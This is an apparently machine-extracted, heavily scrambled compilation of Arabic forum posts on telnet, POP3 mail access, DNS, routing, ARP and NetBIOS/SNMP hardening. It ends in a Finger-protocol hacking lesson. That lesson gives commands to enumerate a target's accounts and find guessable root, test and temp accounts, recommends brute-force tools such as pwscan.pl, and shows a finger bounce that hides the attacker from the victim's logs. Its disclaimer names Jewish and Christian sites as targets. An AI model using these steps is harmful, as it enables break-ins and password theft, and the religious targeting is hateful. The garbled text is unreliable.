الشبكة مع إتصال على تكونتكتب Run ثم Start من إذا Telnet pop.mail.yahoo.com 110 ثم طبعا
وجود مالحظة مع الخاصبك الحساب اكتب أو الياهو مع حسابك كانالرقم و الثانية الجملة و االولى الكلمة بين فراغ
الدوساكتب مثل نافذة لك اسم user ستظهر بعدها اكتب ثمعلى تشاهده ال ستكتبه الذي أن مالحظة مع بريدك في المستخدم
مثل تهتم ال إنتر user xxxx النافذة ثماكتب ذلك مثل pass بعد السري الرقم اكتب إنتر pass xxxx ثم ثم
كلمة ستشاهد صحيح إدخالك كان إنتر Ok إذا تضغط ما بعد
الحساب إلى إدخالك سيتماكتب وأحجامها الرسائل جميع إنتر Listلمشاهدة ثم
يدل ثاني رقم رقم كل بعضوأمام تحت الرسائل ترتيب ستشاهدالرسالة حجم على
اكتب القائمة من رسالة الهدف dele لحذف الرسالة رقم ثمبريد مع الطريقة هذه pop تنفع
الفنتوخ الدكتور من التلنت طريق عن البريد سحب طريقةالتلنت مع المستخدمة بعضاألوامر
بعيد جهاز مع التلنت عميل وصلالجملة بناء
open [\\RemoteServer] [Port]المعلمات
\\RemoteServer . سيتم ما، ملقما تحدد لم إن إدارته تريد الذي الملقم اسم تحديد
المحلي الملقم .افتراضPort
. سيتم ما، منفذا تحدد لم إن استخدامه تريد الذي المنفذ تحديداالفتراضي المنفذ .افتراضمالحظات
إلى األمر هذا اختصار .o يمكنكأمثلة
بعيد بملقم المنفذ Redmond لالتصال رقم خالل اكتب 44من ، :o redmond 44
عميل تصال بعيد Telnet لقطع كمبيوتر منالجملة بناء
close [\\RemoteServer]المعلمات
\\RemoteServer . سيتم ما، ملقما تحدد لم إن إدارته تريد الذي الملقم اسم تحديد
المحلي الملقم .افتراضمالحظات
إلى األمر هذا اختصار .c يمكنك
أمثلةبعيد ملقم من االتصال Redmond لقطع ، :اكتب
c redmond 44
عميل أوامر Telnet إلرسالالجملة بناء
send [\\RemoteServer] [ao] [ayt] [esc] [ip] [synch] [?]المعلمات
\\RemoteServer . سيتم ما، ملقما تحدد لم إن إدارته تريد الذي الملقم اسم تحديد
المحلي الملقم .افتراضao
اإلخراج أمر .إحباطayt
أمر ."?Are you there" إرسالesc
الحالي الهروب حرف .إرسالip
العملية أمر .مقاطعةsynch
تزامن عملية .Telnet أداء
لعميل الحالية اإلعدادات Telnet لعرضالجملة بناء
display المعلماتبال
مالحظاتاألمر لعميل display يسرد الحالية التشغيل كنت .Telnet معلمات إذاعمل جلسة ( Telnet في بملقم متصال كنت إذا أخرى، ،)Telnet بعبارة
عمل جلسة من الخروج بضغط Telnet يمكنك المعلمات لتعديلCTRL+]. عمل جلسة إلى Telnet للعودة ، .ENTER اضغط
بالـ المحلي التلنت ملقم tlntadmn إدارةملقم يشغل كمبيوتر Telnet إلدارة
الجملة بناءtlntadmn [\\RemoteServer] [start] [stop] [pause] [continue]
المعلمات\\RemoteServer
. سيتم ما، ملقما تحدد لم إن إدارته تريد الذي الملقم اسم تحديدالمحلي الملقم .افتراض
start ملقم تشغيل .Telnet بدء
stop ملقم تشغيل .Telnet إيقاف
pause ملقم .Telnet مقاطعةcontinue
ملقم .Telnet استئنافمالحظات
ملقم يشغل بعد عن كمبيوتر إدارة األوامر Telnet يمكنك باستخدامtlntadmn نفسنظام يشغالن الكمبيوتر جهازي من كال كان إذا
ويندوز المطلوب فإذا ويندوز 2000التشغيل بي ال. 2000استخدمه األوامر استخدام يشغل tlntadmn يمكنك بعد عن كمبيوتر إلدارة
Windows 2000 وملقم Telnet يشغل كمبيوتر .مثال Windows XP منملقم يشغل كمبيوتر على االتصاالت لعدد األقصى الحد لتعيين
Telnetالجملة بناء
tlntadmn [\\RemoteServer] config [maxconn=PositiveInteger]المعلمات
\\RemoteServer . سيتم ما، ملقما تحدد لم إن إدارته تريد الذي الملقم اسم تحديد
المحلي الملقم .افتراضmaxconn=PositiveInteger
. العدد هذا تحديد عليك يجب لالتصاالت األعظمي العدد تعيينمن أصغر موجب صحيح عدد ماليين 10بواسطة .
على الفاشلة الدخول تسجيل لمحاوالت األعظمي العدد لتعيينملقم يشغل Telnet كمبيوتر
الجملة بناءtlntadmn [\\RemoteServer] config [maxfail=PositiveInteger]
المعلمات\\RemoteServer
. سيتم ما، ملقما تحدد لم إن إدارته تريد الذي الملقم اسم تحديدالمحلي الملقم .افتراض
maxfail=PositiveInteger المسموح الفاشلة الدخول تسجيل لمحاوالت األقصى الحد تعيين
. صحيح عدد بواسطة العدد هذا تحديد عليك يجب للمستخدم بهامن أصغر 100موجب .
يشغل كمبيوتر على العمل جلسات خمول أجل من المهلة لتعيينTelnet ملقم
الجملة بناءtlntadmn [\\RemoteServer] config [timeout=hh:mm:ss]
المعلمات\\RemoteServer
. سيتم ما، ملقما تحدد لم إن إدارته تريد الذي الملقم اسم تحديدالمحلي الملقم .افتراض
timeout=hh:mm:ss والثواني والدقائق، بالساعات، المهلة فترة .تعيين
الـ يستخدم األوامر ?/ دائما موجه في التعليمات ..لعرض8. الـ " عن " DNSمعلومات
> إعصار منتدى من >منقول> Dark Devil :الكاتب<
معا اتفاق نعقد دعونا نبدأ ان : قبلهكر لكلمه توصلنا التى االشياء تعلم فى لنبدأ و هكر كلمه فلننسا
سب هورسساو تروجن ليسمعنا الهكر طبعا و الكلمه بمعنىالخ ..... سفن
اليونكسو اللينكسو مثل التشغيل نظم تعلم هو الحقيقى الهكريكون التى البرمجه بعضلغات بجانب المواقع تصميم لغات تعلم
السى لغه هى مجالنا فى C اهمهاالمفيد فى التكلم لنبدأ و الخالبيط هذه كل من دعونا االن :و
هى ما نعرف ال لكن و كثيره اشياء عن نسمع بعضاالحيان فى نحننتكلم الملفسوف هذا فى و هى ما نعرف و نكتشف ان نحاول ال و
يعرف ال معظمنا لكن و كثيرا عنه نسمع شئ عنهو : ما
ال هو الشئ هذا :DNS وال لكن و الكثيرين يسمعه الذى االسم هذا عن بالتحدث نبدأ سوف و
هو ما : يعرفوننفسه بالسؤال لنبدأ و
==================================================
=========================ال هو ?DNS ما
==============لكلمه DNS : اوال اختصار سرفر . Domain Name System هو يتصل وبورت DNS ال على احد 53عادتا الى االتصال اردت اذا انك يعنى مما
ال استعملت و تتصل DNS المواقع فسوف حقهالبورت طريق عن ال 53به يحول او يترجم سوف و translates
alphabetical hostnames مثل الموقع اسم يعنى و:http://www.burn.com/ الى IP ADRESSES العكس 127.0.0.1مثل و
العمليه تتم عندما و صحيحمباشره بالموقع تتصل
تسمى هذه التحويل عمليه تحليل address resolution و او تحويل اىالى الموقع به IP عنوان االتصال العكسلنستطيع او
ال ظهور قبل ال DNS و لعمليه اخر اسم و. address resolution كانال ظهر قد من DNS لكن بكثير الهوستساسهل توزيع لجعل
من انه حيث الماضىاربعه تتذكر ان من افضل تريده معين موقع اسم تتذكر ان السهل
االرقام من . )IP( خاناتال ل المستعمل االسم كان ال address resolution و كان DNS قبل
ال اسمه ملف من اسماء HOST FILE يتكون عن عباره كان والمواقع الهوستساى
ال عنواوين رعايته IP و تتولى الملف هذا كان و بهم الخاصهStanford Research Institute's Network Information Center )SRI-
NIC(. ان الراعى هذا على كان وبالعنواوين )UPDATE( يجدد يمده و اسبوع كل حوالى هذا الجدول
هو يجدد ان ادمين السيستم على و ظهرت التى االرقام و الجديدهاو ملفه االخر
ال اتصال طريق اى FTP عن الراعى بين و .SRI-NIC بينهفى النظام هذا بدأ السريع و الرهيب النترنت تطور مع طبعا و
فى التحكم يستطيع الذى االمثل النظام عن يبحثون بدأو و الفشلبى االى و الهوست
ال ظهر طبعا و دقه و بترتب و بسرعه و واحد وقت فى DNS معاذلك .ليفعل
ال اى DNS و مركز ماكينه decentralized ليسله ليسهناك انه اىال كل فى يتحكم معين سيستم بالعكسفال DNS او عباره DNS بل
بيز داتا عنسرفر كل و مختلف سرفر كذا على توجد و منظم بشكل موزعه
معينه DNS عليه معلومه على يحصل ان يريد عندما يبحث اين يعرف
معين هوست .اوال عن عامه لمعلومات بالنسبه قبل DNS هذا النظام كان كيف و
القديمه االنترنت حركه عن عامه نظره ايضا هى و . اكتشافه
THE DNS SERVER:================
نظام DNS SERVER ال على عادتا يعمل و كمبيوتر عن عباره هوUNIX اليونكس برنامج يستخدم باليونكسو الشبيهه النظم BIND اوهذه .)Berkeley Internet Name Domain( اى مثل برامج ايضا يوجد و
ايضا الماكنتوش و للويندوزك استعمالهم احد اراد ال DNS SERVER اذا يفضل الكل لكن UNIX و
.ال برنامج يتكون جزئين DNS و : من
the name server itself )the daemon program that listens to port 53( يسمى االخر RESOLVER و
ال تطلب NAME SERVER و عندما متصفحك الى يستجيب هذاتطلب او تكتب و اكسبلورر االنترنت تفتح عندما فمثال معينه معلومه
مثل معين موقه منهhttp://www.burn.com/ اقرب المتصفح و ) DNS فسيسئل له موجود
) عن الخاصبك بى االى رقم و بالشبكه اتصالك على يعتمد هذاال /http://www.burn.com ل IP عنوان
ال هذا يحتاج المتصفح الهوست IP الن هذا لديه الذى السرفر ليجدلك ليعرضها السرفر من الموقع محتويات يطلب و الموقع هذا اى
متصفحك .فىال سيسئل هذا قبل ذاكره daemon program و فى اى جداوله فى
سبق ما الى ينتقل يجده لم فأذا تطلبه الذى الموقع عن متصفحكالعمليه تتم هكذا و .شرحه
THE TREE INFORMATION:======================
رقم تطلب عندما انك على اتقفنا ان بعد اصدقائى االن معين IP وال فى يجده ال و حقك المتصفح الخاصبك DNS من اى المحلى
ال يسأل ليجده DNS SERVER سوف عنه المستوى فى منه االعلىو اعلى مستوى فى للبحث فينتقل اعلى مستوى فى يجده لم اذا و
ال مستويات فى االعلى الى االقل من البحث يسير هكذا و اعلىDNS SERVERS.
و اتصال شجره وجود فنستنتج االتصال هذا من نتيجه طبعا وبالضبط تعمل كيف لكن و معلومات
مثال نأخذ : دعوناال ان فرضنا مثال ISP لو كان على isp.co.uk الخاصبك يعتمد هذا و
عليه تشبك الذى السرفر و الشركه حسب اى باالنترنت اتصالكال يكون ان طبعا الطبيعى مثل ISP's DNS server's hostname فمنال dns.isp.co.uk هذا هذا سألت انك فالنفرض االن ليبحث DNS و
عن /http://www.burn.com الخاصب IP لك ال هذا فسيقوم مثالdns.isp.co.uk عنده الذاكره فى المخذنه المحليه جداوله فى بالبحث
ال من اعلى مستوى الى قلنا كما فسينتقل يجدها لم اذا و فيجدهاDNS SERVER االعلى المستوى فى ايضا يجده لم اذا و فيه ليبحث
من فمثال كليا البحث مكان بتغيير يقوم ان الى dns.isp.co.uk فعليهsome-organization.org.uk او school.edu.uk, university.ac.uk,
england.gov.uk, airforce.mil.uk كل و طبعا كثيرا امثله هناك و الخ و
ينتهىب له UK شئ المتاح االماكن كل فى ايضا يجده لم اذا واكبر الى المتصفح فسيرجع فيها و DNS البحث الشبكه على موجود
ال ال ROOT اسمه عناوين كل على يحتوى للمواقع IP فهو كل علىاى على .DOMAIN NAME الموجوده
When and why does DNS "hang" or fail?======================================
لل ايضا يمكن ال . DNS و كان اذا سريع او بطئ يكون الخاص ISP انال على يحنوى من IP بك اجزاء الى فقط يحتاج فسوف طلبته الذى
. المتصفح انتقل اذا اما متصفحك فى يعرضه و لك به ليأتى الثانيهال من اعلى مستوى فى من DNS للبحث قليال الى يحتاج فسوف
حتى يمتد رساله . 15الوقت تأتيك سوف يجده ال انه حاله فى و ثانيه تقول متصفحك نتيجه address could not be found من يحدث هذا و
المتصفح فهو IP او HOST اعطاء طبعا بالتالى و عنه ليبحث خطأفيقوم البحث طول نتيجه او ليعرضه االساس من ليسموجود
ال مع االتصال بقدان عمليه DNS متصفحك . TIMED OUT اىعلى المتصفح فى نضغط الحاله هذه فى و
او&@#&@#&@#&@#&@#&@#&@# RELOAD حسب طبعا. متصفحك
عن بعيده هى التى المعلومات بهذه جميعا افدتكم قد اكون ان ارجولكم قلت كما و اصدقائى يا الهكر تعلم اساسفى لكنها و الهكر
و البرمجه اساليب تعلم هو الهكر الباتشات و التروجان ليس الهكرو االنترنت عالم فى جديد شئ كل معرفه و المواقع تصميم كيفيه
االخطاء تصحيح و الموضوع قرائه و الدخول المحترفين من ارجوو االخطاء من خالى متكامل و كامل موضوع يكون حتى به التى
على موجود انا سؤال اى و المعلومات مع تفاعلكم و ردودكم نتظرمقدرتى قد
ال عن معلومات هو و القادم موضوعى انتظرو ما SSL و سنعرف وبالتفصيل هو
بركاته و الله رحمه و عليكم السالم .و،،،انتهى
" Routing in the Internet معلوماتعن "> إعصار منتدى من >منقول
> Dark Devil :الكاتب<بركاته و الله رحمه و عليكم :السالم
الكثير و الشبكات علم فى مهم شئ عن اصدقائى يا نتكلم سوفال هو الشئ هذا و به علم غير على .Routingمنكم
منه تستفيدون و الموضوع يعجبكم ان اتمنى و نبدأ دعونا االن :وRouting in the Internet:
========================= what is routing?!
تنتقل طريقه عن الذى ميكانزم او تكنيك عن عباره هو الروتنجاخر الى هوست من او اخر الى كمبيوتر من .المعلوماتوهم الروتنج من مظاهر ثالث يوجد االنترنت سياق فى :و
1-Physical Address Determination
2-Selection of inter-network gateways
3-Symbolic and Numeric Addresses
ال داتا تنتقل عندما المهم هو االشياء هذه فى االول يعتبر من ipوبال. الخاصه الداتا هذه نغلف ان الدرورى فمن أطار ipالكمبيوتر بأى
ورك بالنت او للجهاز المحليه ورك بالنت متصله تكون صيغه اى من. و الداتا هذه انتقال عند عليها الموجود حالته فى الجهاز بها المتصل
او المحليه ورك النت عنوان ال من التضمين الغالف هذا يتطلباى بالبيانات يحيط الذى االطار مع للشبكه لهذا الفيزيائى العنوان
)inclusion of a local network address or physical address within the *****(.
االنترنت الن درورى و ايضا مهم اعاله المذكور من الثانى الشئ واى وركسالمحليه النت من عدد من مربوطه local networks تتكونال اى المداخل من كثير او .gatewaysبواحد عموما المداخل هذه و
ال بالروترساى , routersتسمى او فيزيائيه اتصاالت لها يكون احياناو . المالئم المدخل تحديد و وركس النت من الكثير مع بورتات
ال داتا لتفصيل اى ipالبورت روتنج نسميه ما تتضمن routing هذا ومعينه بطرق المعلومات تبادل داخل .ايضا
ال اى العنوان انتقال يتضمن الذى هو المذكور من الثالث addressوtranslation عليه التعرف نستطيع و نعرفه الذى الكتابى الشكل من
المتصفح عنوان مثال المقصود و بسهولهصعبه ip الى /http://www.burn.com اى معقده رقميه اشياء الى اى
ال طريق عن المهمه هذه تؤدى ( DNS و موضوعى مراجعه ارجوال عن اكثر DNSاالول .) لالستفاده
ال تحديد عمليه شرح فى ندخل االن : اى Physical AddressوPhysical Address Determination:
=============================== ينقل ان كمبيوتر جهاز يريد كان ان ip data اذا الى يحتاج فأنه اذن
. هذا لنجاح و بها الجهاز المتصل للنتورك تابع مخصصو بأطار يغلفيسمى ما نحدد ان الدرورى من االطار بهذا الغليف ظل فى االنتقال
. physical addressبال ببساطه و بنجاح يتم هذا و الكمبيوتر ألتجاهال تحويل كيفيه يوضح سوف جدول استخدام طريق الى ipعن
physical addresses , ال عناوين على يحتوى الجدول هذا ipفمثاللها المعروف العنوان او االدرس . للنتوركسو
يكون ان الطبيعى من قرائته و الجدول هذا على للحصول وو الجدول هذا على للحصول معين بروتوكول يستخدم الكمبيوترال بأسم physical addresses الى ipتحويل يعرف البروتوكول هذا و
ARP اى Address Resolution Protocol االدرس تحليل بروتوكول اىال تحويل كلمه معنى فهمنا و ادركنا االن اننا اعتقد الى ipو
physical addresses , بأسم الجدول هذا نعرف ان يمكن ARP وcache .
امر نستخدم الجدول على للحصول اليونكسايضا arp -a و فى ونفساالمر .نستخدم
االمر تنفيذ بعد يظهر الذى الجدول على جهازى من حى مثال هذا و:
C:\WINDOWS<arp -a
Interface: 62.135.9.102 on Interface 0x2 Internet Address Physical Address Type 207.46.226.17 20-53-52-43-00-00 dynamic 213.131.64.2 20-53-52-43-00-00 dynamic
213.131.65.238 20-53-52-43-00-00 dynamic
الشبكات كل عناوين هى هذا امامكم الموجود ادرس االنترنتاالنترنت الى دخولى بعد بجهازى المتصله
ال بهذا Physical Addressو و يتغير ال ثابت انه تالحظون انكم اعتقدال ان لكم نوضح و نقول ان ال Physical Addressيمكننا هو Mac هذا
Address العمل اثناء النتوركس به تتصل الذى نفسه الجهاز رقم اىال تحديد ان كالمى فى قلت فقد لذلك مهم Physical Address و
ال داتا او معلومات نقل عمليه فى بدون ipجدااا Physical النهAddress ال فى الباكيدجسالموجوده فكيفستتعرف routerاذن
طريقها .علىال مكتوب type و يتغيير dynamic هذا انه بمعنى ثابت غير انه اى
العمل اثناء يثبت لكنه و الجهاز فى مره لكل ريستارت عمل عنداالنترنت . على
ال هو و االخر النوع هناك فقط " staticو هذا يتغير ال الذى الثابت اى "للتوضيح
هى ما و الروتنج هو ما بسيط بمعنى فهمنا اننا االن اعتقدroutersال،،،انتهى
" NETBIOS "> نورة موقع من >منقول
على قادر ستكون الموضوع هذا قراءة بعدالخالية • الجلسات صد
المستخدمين • تعداد منعالـ • تعداد SNMPمنع
على اعتماد للويندوز االفتراضي اإلعداد في وهي NetBIOS يوجدالـ ألن المهمة الشبكات ألصحاب كبيرة واجهات NetBIOSمشكلة لهاالمنفذ API تداخل خالل الهدفمن حول معلومات وترجع 139تعيد ، TCPلـ من حتى ممكن الوصول يكون االفتراضية الحالة وفي
عند كبير يكون قد خطرا فيه يكون هذا وطبعا ، الهوية مجهولينأنظمة على الولوج محترفين من NT استخدامه
خدمات كل تلغي أن أنها NetBIOS تستطيع تجد عندما ما جهاز علىخصائص من ذلك ويكون لك ظرورية من TCP/IP غير Advanced ثم
التبويب من التالي WINS ثم المثال في الواضح الخيار على تعلم ثممايكروسوفت قدمتشركة فقد لك مهمة الخدمة هذه كانت وإذا
تدعى وهى مناسبا كبير RestrictAnonymous حال بشكل تحد وهيالوصول وتستطيع ، المجهولة الوصالت عبر المعلومات تسرب من
من من Administrative TOOLS إليها ثم Local Security policy ثمنختار النافذة من Local poicies من نعلم security options ثم ثم
األول الخيار Additional restrictions for anonymous علىconnections نختار االيمن بالزر من security ثم نختار النافذة من ثم
الخيار المنزلق No Access Without Explicit Anonymous الشريطPermissions
الـ أدوات إلستخدام NetBIOSبعضاألمثله Net View
اوامر سطر أداة وهي نفسه التشغيل نظام ضمن مضمنه األداة هذهعلى NT/W2000 على االجهزة وكل المتاحة الميادين تعرض وهي
ويكفي ، األجهزة على لتشارك المتاحة الخدمات وكل الميادين هذهعنوان تكتب ما IP أن على حصلت قد تكون حتى الدومين اسم أو
تريداألمر إستخدامات عن المزيد انقر Net ولمعرفة الشبكة إدارة . في
بنفسالعمل تقوم االنترنت على المتاحة بعضاألدوات وتوجدالمدعوه األداة هذه منها احترافي اداة Nbtscan بشكل أيضا وهي
من تحملها أن وتستطيع أوامر ... سطرمن ميسر شرح ... ولمشاهدة
بنفس للقيام االنترنت على كثيرة شعبية رسومية أدوات وتوجدالبرنامج المثال سبيل على منها ، Legion العمل
المريح الحلمن المقدمه المنافذ حماية هو الصداع هذا لتخلصمن المريح الحل
البروتوكول TCP البروتوكول من UDP و المنافذ المنفذ 135عبر إلى خاللها 445 +139 من تستطيع المتقدمة النارية الجدران برامج وكل ،
الخدمة نلغي كيف وشاهدنا ، مريح بشكل بالمنافذ تتحكم أنNetBIOS الزال ذلك كل ورغم ، منها المحتمله المشاكل من نقلل أو
البروتوكول تستخدم كنت إذا موجودا الشبكة SNMP الخطر إلدارةويندوز المعلومات 2000على كل يمرر البروتوكول فهذا ، سيرفر
المطلوب بالشكل البروتوكول هذا ولتأمين ، مثبتا كان إذا المطلوبةاالول خيارين أمامك
المجموعة اسم االفتراضي Public حذف التثبيت عند تكون التيالمثال في كما الشبكة مستخدمين من مخصصة أسماء وتكون
الزر public المجموعة من ثم عليها علم حرر ****Re موجودة ثم Send authentication trap المربع
لألشخاص البروتوكول هذا استخدام حصرت قد تكون بذلكفقط المختارين
السجل محرر من الثاني regedit والحلHKEY_LOCAL_MACHINE\system\currentControlset\servec es\
SNMP\parameters\ExtensionAgentالمفتاح بحذف قم ترقيم LANManagerMIB2Agent ثم بإعادة قم ثم
من = ليبدأ الترقيم أعد واحد رقمه حذفته ما كان ذا إ مثال المدخالترقم للمدخل 2واحد
البروتوكول أن تعلم بدون TCP/IP هل سليم بشكل العمل يستطيعالـ ، NetBIOSخدمات أفضل تعطيله إليه محتاج غير كنت إذا لذلك
،،،انتهى
خدمة " "Finger بروتوكول> اإلسالمية الحزم شبكة منتديات من >منقول
>LAMeR :الكاتب<وبركاته الله ورحمة عليكم السالم
خدمة بروتوكول الدرسعن هذا مني تتقبلون انكم Finger اتمنىبورت على تعمل 79التي
الدرس نبدأ الله بسم
الدرس فهرسمحتويات>================<
تبرئة 1.1عن 1.2 Finger مقدمةFinger استخدام 1.3
خدمة 1.4 استخدام عند الخدع Finger بعضبأستخدام 1.5 موقع طريق عن Finger األستعالم
الدرس 1.6 هذا من األستنتاجالختام 1.7
:تبرئة 1.1>=========<
والنصاري اليهود مواقع على والتطبيق للتعليم الدرسفقط هذاللمسلمين الضاره
الدرسضد لهذا السيء لالستخدام مسؤولية اي يتحمل ال فالكاتبالمسلمين .أخواننا
عن 1.2 Finger مقدمة>===================<
البورت Finger إن طريق عن تعمل خدمة وكانت 79ديمون عادةكنوع أصال للناس businesscard مستخدمة .رقمي
البعيد إلى ) remote user(المستخدم طلب يرسل أن Finger يمكنمعين نظام على يجري ديمون
79نوعية Finger بورت( إجابة ) على .وسيحصل
أيضا و النظام هذا على المستخدمين هم من ستخبرك اإلجابة هذهبالنظام المتصلين المستخدمين هؤالء عن المعلومات .بعض
, أيضا تخبرك اإلجابة األحيان أغلب في المعلومات هذه إلى إضافةالنظام يدير الذي باإلتصال )admin(من قام .وكيف
العالم في األنظمة انواع جميع على الناساألتصال استخدم قديماالـ و األنظمة هذه عن األستعالم يعطيهم Finger وطلب كان
معلوماتعن هذا في حسابات لهم وهل النظام في الموجودون هم من
وكان. في Fingerالنظام قديما يستخدمأيضا الكبيرة الشركات و .الجامعات
الـ ، الماضي في Finger في الطالب طريق عن عامة إستعمل الجامعات
نفسالجامعه في اخرين تخصطالب معلومات ارادوا اذا
األجابة تكون ما " !Finger me " بجملة ) Finger Deamon اجابة( وكثيراأعلمني " " ! اي
اصبح العالمية اإلنترنت شبكة وجود ومع اآلن Finger أمااآلن توجد ألنه ، شهرة أقل
عمل كبطاقة للعمل الويب خاصة )bisinesscard(مواقع رقميةالناس مالحظة وبسبب األنترنت بمستخدمين
خدمة استخدام قل األلكتروني لألمن الواسع Finger التهديدDeamon
حال أية ،علىالمواقع بعض وستجد الخدمة هذه منعت األنظمة ليسكل
) الخدمة) هذه تقدم األنظمة . بأستخدام األنظمة اختراق بمحاوالت الهكرز يقوم األيام وهذه
برامجportscans . . . أساسعلمي أي بدون المفتوحة البورتات عن . للبحث
إن لخدمة Finger لذلك عظيم مثال ديمون،المعلومات من ضخمة بكمية لتزودك قانونيا استخدامها يمكن
الحساسةهدف .حول
مفهومة بلغة الدرس هذا في اشرح ان أحاول سوف لهذاهو في Finger ما استخدامه يمكن وكيف يفعل وماذا ديمون
مصلحتك
: خدمة ان المقدمة تستخدم Finger الخالصة والزالت قديما كانتعن المعلومات لجلب
هذا في حسابات لديهم هل و النظام في الموجودين المستخدمينال ام . النظام
النظام : معلومات ) server (مالحظة فيه تخزن كمبيوتر جهاز هوالمواقع استضافة في ويستخدم هائلة
Finger استخدام 1.3>=================<
مثل المعروفة السكان برامج من اي استخدام ) superscan( عند للبحث
معين موقع منفذ ) /http://www.foobar.com مثال( في به ووجدت)Port مفتوحا 79 )بورت
ان يعني /http://www.foobar.com هذايعمل Finger له .ديمون
بـ نقوم كيف استعالم؟ )request(اآلن طلبوندوز طريق عن
زبون يوجدبه ال وندوز األحيان أغلب للـ )client( في Finger خاص ) installed ( مركب
نستخدم سوف لـ Telnet لذلك Finger كخادم
--توضيح--Telnet)client( --------request-------< Finger Deamon)in Server( o
الدوس موجة في اآلتي السطر كتابة طريق : ) MS DOS( عن
telnet http://www.foobar.com/ 79
برنامج لك سيظهر ذلك األوامر telnet بعد تطبع منه . و
يونيكس من امالينوكس بنظام يوجد ألنه تيلنت نستعمل أن إلى بحاجة لسنا)client(زبون بخدمة Finger Deamon خاص
تقريبا دائم بشكل النظام على .مركب
الدرسلمستخدمي ::: نهاية حتى التالي الشرح سيكون مالحظةبأستخدام األستمرار قررت أذا لينوكسأما
التلنت في الدوسثم موجه في األوامر كتابة ستكون وندوزالتي األوامر نفسها األوامر كتابة وستكون
ثم "@" " مسافة نضع بدل لينوكسولكن نظام بأستخدام تنكتبwww" الموقع اسم مراعيا الوندوز في
لينوكسهكذا في األوامر كتابة يكون : مثال[email protected] هكذا سيكون وندوز في : ولكن
finger http://www.anyname.com/ بين المسافة www و finger الحظ
يونكس في األوامر محث في تستخدم ( اطبع انك افتراض unix علىshell ( :
[email protected]هم ) من معرفة مثال عنه المراداألستعالم الموقع الهدف ان الحظ
هو ( هنا كمثال /http://www.foobar.com مستخدمينه
:فستظهرالنتائج
Login: Name: Tty: Idle: When: Where:
root foobar sys console 17d Tue 10:13 node0ls3.foobar.comAmos Amanda >.......< >.......< >.......<
Anderson KennethBright Adrian
Doe JohnJohnson Peter >.......< >.......< >.......<
Mitnick KevinMunson GregOrwell Dennis
النتائج؟ هذه تعني ماذا اآلناألول العمود ) login ( في الثاني وفي المستعملين أسماء نرى
)Name( " الحقيقية ،"األسماءحقيقة الوقت معظم في لكن حقيقية، ليست بالطبع .التي
الثالث العمود )Tty( يرينا الطرفي the terminal type النوعالتوقف )Idle( والرابع .the idle timeفترة
الخامسوالسادس العمودين في ذلك وبعدبالنظام لألتصال الحساب فيه استخدم الذي والمكان .الوقت
الخاصة .. الخ هواتف وأرقام األيميالت بعنواوين أعمدة توجد أحياناالنظام هذا بمستخدمين
معين مستخدم عن المعلومات من المزيد تريد كنت Johnson( إذاPeter جونسن بيتر
) التالي األمر أدخل المثال سبيل :على
finger [email protected]
خدمة 1.4 استخدام عند الخدع Finger بعض> =========================
===========<
لخدمة الرئيسي الضعف ما شاهدت اآلن .Finger أتمنىFinger deamon النظام على الموجوده الحسابات ماهي .يريك
قانوني ) ( طريق عن تكسب أنك يعني المجموعة % 50هذا من وهي السحرية
/ الدخول ستمنحك التي المستخدمين أسماء مجموعة السر كلمات)Access( نظام .إلى
متوقفه القادمة الخطوة ستكون المستخدمين، أسماء عرفت إذابرنامج أو bruteforce على
الباسوورد تخمين برامج آخر worldist password cracker بمعنى
المثال سبيل على للتيلنت كتبت خاصة سكربتات هناكلموقع /http://www.thehackerschoice.com اذهب ابحثعن أو
VLAD's pwscan.pl
ملفنصي في السر بكلمات قائمة تكون ان عليك يجب word( لذلكالمفكره )او
لم وإذا المستخدمين أسماء من السرقريبة كلمات تكون ان وحاولالقائمة تعمل
برنامج - bruteforce استخدم كأس لك تحظر ان الوقت بهذا أنصحكاستراحة لك وتأخذ شاهي
عمله يعمل البرنامج -وتجعلمن اهمية اكثر للنظام للمستخدمين الحسابات بعض نجد بالطبع
الحسابات من .غيرهااإلدارة حساب الجذر )Admin( وخاصة تعرف )root(أو عندما انه بسبب
الخاصبهم الباسووردالحساباتسهلة . بعض وبالطبع بالموقع التحكم تستطيع وقتها
السر كلمة . تخمين . سبيل على الحسابات من النوع هذا لمعرفة الخدع بعض هناك
المثالاألمر :إطبع
finger [email protected]
الي األمر هذا ترسل جميع Finger Deamon عندما سيعطيكالحسابات
كلمة على تحتوي اإلسم "secret" التي أو المستعمل اسم في أما.الحقيقي
تستعمل أن يمكنك أنت حسنا هذا؟ في المهم الشي ماهو "test" اذا،0000أو " "temp" أو "
من من "secret" بدال هذاالنوع يكون ان المحتمل من تعرف وكما الحسابات
األحيان أغلب في باسوورداته معرفة .سهل
finger [email protected]
finger [email protected]
يحدث ما وشاهد األوامر هذه !جربعلى التعرف Finger Deamon حاول ، بنفسك RFCأقرأ خدعك !وأوجد
بأستخدام 1.5 موقع طريق عن Finger األستعالم> =========================
=============<
خدمة استخدم ان أردت " Finger معنى( Finger إذا ألمس " كفعلاستعلم " بمعنى هنا تأتي )"ولكنها
هذا مثل معين موقع عن "www.victim.com"واألستعالمآخر موقع أن تعرف خدمة "www.host.com" وأيضا Finger يقدم
،تعملهذا مثل طلبا أقدم ان يمكنني األوامر عندها محث في اكتب هذا )مثل
[email protected]@victim.com
Host.com يستعلم )Finger( اآلن victim.com النتائج .ويريكلدى مجهول ستكون انك الطريقة هذه من victim.com أحدالفوائد
تقوم /http://www.victim.com فعندما في /http://www.host.com ستشاهد )logالدخول( بطلبسجل
منك بدال . سجالتهم،تترك ان يمكن أنك وهي اخرى طريق ( يقوم )موقع( Host فائدة عن
) Finger خدمة حاسوبا عن باألستعالماألستعالم هذا انت طلبت اذا بينما ، نفسالشبكة على آخرا
خدمة جهازك Finger بأستخدام منالمستعلم لدى به موثوق غير سأكون ألنك لك مسموحة تكون لن
عنهباستخدام لألستعالم الطلب كان اذا موقع Finger بعكس طريق . عن
حاسوبك : يعتبر عنه األستعالم تريد الذي الموقع ان الخالصة يعني
بعكس به موثوق غير الشخصيله يسمح فسوف يشابهه اخر موقع طريق عن األستعالم كان .! اذا
1.6 الدرس هذا من األستنتاج>=======================<
Finger Deamon واحد ألي معلوماتضخم مصدر يكون أن يمكنيحاول
الدخول نظام ) access (كسب .إلىFinger deamon واسماء السر كلمات بنصف يزودك قانونيا
المستخدمينالدخول لكسب تحتاجها .access التي
عنها تبحث خاصة حسابات معرفة من تمكنك لطيفة خدع بضعة هناكبإستعمال ، الباسووردات كسر تستطيع الحسابات لهذه معرفتك من
.bruteforce أو wordlist تقنية " بأستعمال " أيضا موقع طريق عن األستعالم فوائد Finger تذكر
deamon.
9.االمر ".10 بإستخدام الشبكة إلدارة مختصر " NETشرح
